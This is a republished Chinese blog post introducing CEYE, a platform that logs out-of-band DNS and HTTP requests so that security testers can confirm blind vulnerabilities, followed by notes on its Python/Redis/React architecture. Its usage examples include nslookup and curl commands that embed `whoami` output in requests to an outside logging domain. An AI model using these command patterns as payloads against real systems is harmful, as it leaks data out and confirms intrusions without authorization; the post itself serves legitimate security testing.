专栏首页Seebug漏洞平台开发小哥手把手教你用CEYE,请给他打电话!

开发小哥手把手教你用CEYE,请给他打电话!

作者:xixijun@知道创宇404实验室

1、CEYE 是什么

CEYE是一个用来检测带外(Out-of-Band)流量的监控平台,如DNS查询和HTTP请求。它可以帮助安全研究人员在测试漏洞时收集信息(例如SSRF / XXE / RFI / RCE)。

2、为什么会有CEYE

提到为什么会有CEYE就必须提到它的使用场景了。 有两种常见的情况会导致许多漏洞扫描工具漏扫:

  • 漏洞检测或漏洞利用需要进一步的用户或系统交互。
  • 一些漏洞类型没有直接表明攻击是成功的。如Payload触发了却不在前端页面显示。

为了解决这个问题,我们开发了CEYE平台。通过使用诸如DNS和HTTP之类的带外信道,便可以得到回显信息。

3、如何使用

登录 CEYE.IO,在用户详情页(http://ceye.io/profile)可以看到自己的域名标识符 identifier,对于每个用户,都有唯一的域名标识符如 abcdef.ceye.io 。所有来自于 abcdef.ceye.io 或 *.abcdef.ceye.io 的 DNS查询HTTP请求都会被记录。通过查看这些记录信息,安全研究人员可以确认并改进自己的漏洞研究方案。

通过DNS带外信道检测 Blind Payload 的执行情况

DNS查询可以以多种不同的方式进行解析。CEYE.IO平台提供了一台DNS Server来解析域名。它的 nameserver address 被设置为自己的服务器IP,因此所有关于ceye.io 的域名的DNS查询最终都会被发送到CEYE的DNS服务器。 例如,在终端中使用 nslookup

➜ nslookup `whoami`.abcdef.ceye.io

Server: 127.1.1.1 Address: 127.1.1.1#53 Non-authoritative answer: Name: chan.abcdef.ceye.io Address: 118.192.48.48

可以看到有记录产生

我们保存了最近的100条记录,你可以通过搜索框,搜索并导出你需要的结果,导出格式为 JSON 。更多的Playload信息可以登录 CEYE.IO 平台获取。 通过HTTP带外信道检测 Blind Payload 的执行情况 CEYE.IO平台拥有自己的HTTP服务器,记录用户域名的所有请求。这可以用来做一些有趣的事情。例如:

➜ curl -X POST http://ip.port.abcdef.ceye.io/`whoami`?p=http -d data=http {"meta": {"code": 201, "message": "HTTP Record Insert Success"}}

在后台,CEYE.IO平台将记录客户端请求的URL,远程IP地址,Http Method,Data,User Agent,Content Type等信息。你可以在HTTP Records页面找到这些详细信息。

4、关于CEYE架构

原ceye的架构:

  • 开发语言:python2.7
  • Nginx反向代理
  • 后端WEB引擎:Flask
  • ORM:SQLAlchemy
  • 数据库:MySQL

新的CEYE采用了前后端分离架构: 前端 ceye.io

  • 开发语言:ES6
  • React全家桶:react react-router react-redux
  • 异步请求库:Axios
  • ES6转码编译器:Babel
  • 打包工具:Webpack
  • UI设计:AntDesion
  • UI动效:AntMotion

后端 api.ceye.io

  • 开发语言:python3.6
  • WEB框架:Falcon(https://github.com/falconry/falcon)
  • ORM:redisco
  • 数据库 NOSQL:Redis
  • 数据校验:cerberus
  • 部署:Fabric
  • DNS Server:twisted
  • WSGI Server:gunicorn
  • 负载均衡:Nginx

技术选型

数据库 MySQL or Redis?

我们完全弃用了以前的MySQL数据库,采用了Redis作为后端数据库。原因是当数个表的数据突破了亿行,页面上同时需要读取的动态数据增多时,为了优化MySQL的操作就显得得不偿失。而 Redis 可以在单台服务器上实现每秒数万次的读取和写入。 既然选择了Redis作为后端数据库,那么相应的应该选择一个Redis ORM。这里我们选择了Redisco作为ORM,虽然原作者已经弃坑不更新了,它的继承者也已经快一年多没有回复issue了,也没有做python3的适配。但是谁叫它的接口更符合django orm的操作方式呢。于是提交了一个PR适配了python3。

WEB Framework?

这里我们选择falcon而没有使用flask,django或其他python web框架的原因是它快而且RESTful,这里推荐一个扩展阅读:关于Python Web框架的性能测试结果(http://klen.github.io/py-frameworks-bench/)。

前端框架?

这里面临了2个选择,Vue or React?

  • 选择熟悉的?Vue (iView,Element)
  • 选择适配公司技术栈的?React (AntDesign)
  • 学习新技术!React!

作为一个二手前端,于是开始了踩坑React之旅,各种深坑浅坑不断,还好都一一解决了。

作为曾经的Vue粉简单对比下React和Vue: 生态圈:

明显感觉到了React生态圈的强大,蚂蚁金服前端团队的AntDesion项目,真的把我惊艳到了。它的设计原则让我深刻的体会到了什么是让用户觉得自己是爹。 上手难度: 两者相比,从上手难度来说React的各种概念真的是让新手脑壳疼,而且react的starter kit都构建得无敌恶心。再从代码量方面来说:在写redux action和reducer的时候,各种命名都会显得很繁琐,但又恰好是redux这一套,让后期维护变得更加容易。对于写惯了django template等等后端渲染模版的方式后再学Vue template就会很容易上手,而刚开始用React的JSX语法会觉得有点别扭,但是习惯了又会写得很爽。 这里不展开讨论React和Vue到底哪个好,就和PHP是世界上最美的语言一样,这是个哲学问题

往 期 热 门

本文分享自微信公众号 - Seebug漏洞平台(seebug_org)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-11-08

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 云计算时代个人信息保护的法律规制

    全球席卷“云”浪潮,云计算时代的到来加速了信息流动,使人们能够通过各种类型的互联网终端获取自己所需要的大量信息,极大地提高了信息资源的获取率和利用率。然而,云计...

    静一
  • 云计算产业新政或密集出炉

    一夜之间,我国云计算产业进入普及阶段。而推手正是互联网企业奋力厮杀,个个希望用云计算、大数据一统江湖。 昨日,第七届中国云计算大会在京举行。工信部副部长怀进鹏描...

    静一
  • 五个简单方法助力降低云数据中心安全风险

    家得宝、JP摩根大通、索尼影业和美国第二大医疗保险公司Anthem等知名企业相继传出重大的数据泄密事件后,各行各业的公司企业大力投资于数据保护技术。知名调研机构...

    静一
  • 一个真实的企业移动终端市场:谁在用?机会和挑战?

    移动信息化研究中心近日将发布《2016年移动终端(中小企业)研究报告》显示,移动终端设备正在进入主流的企业市场,但仍然面临安全问题。 有一点毫无疑问的,随着移动...

    人称T客
  • 百度重度联手北汽量产L3无人驾驶汽车,李彦宏:将完成自动驾驶从零到一

    【新智元导读】 百度又公布了最新的无人驾驶量产时间线:于2019年前后实现L3级别自动驾驶车辆量产,2021年前后实现L4级别自动驾驶车辆量产。 我们可能2年...

    新智元
  • 从各“瘫痪”事件看如何安全备份数据库到云存储

    近几周互联网企业频繁暴出各类“瘫痪”事件,网易、支付宝也身负重伤,而5月28日携程网站服务及App全站瘫痪,从事故发生至恢复长达近12小时,造成的损失不言而喻。...

    静一
  • 再下一城!腾讯云、海南省公安厅共建大数据应用实战平台

    近日,海南省公安厅大数据应用实战平台招标结果出炉,腾讯云凭借在云计算、大数据、用户行为画像、综合社交图谱等方面拥有的行业领先优势,以及完备的政务云解决方案中标。...

    腾讯云TStack
  • 政府购买云服务降低行政成本

    过购买云服务,各级政府部门单位将不再单独购买设备建设独立的信息中心(资料片)。 近年来,随着云技术与相关产品的发展,购买云服务的集约化信息化系统方式,已逐渐成为...

    静一
  • 那些你可能不了解的公有云风险成本

    公有云强调了给企业带来的种种好处,但是它并不十全十美。企业应该意识到其不可预测的成本结构以及其他的一些缺点。 ? 公有云服务给予企业诸多优势。他们允许灵活和经济...

    静一
  • 【麦肯锡报告】ADAS驾驶或将成为汽车行业发展主流

    【新智元导读】麦肯锡(mckinsey)的这份报告探讨了一些有关ADAS最为迫切的问题,涉及未来的需求、技术挑战以及竞争格局等。从处理器、传感器、软件算法、地图...

    新智元

扫码关注云+社区

领取腾讯云代金券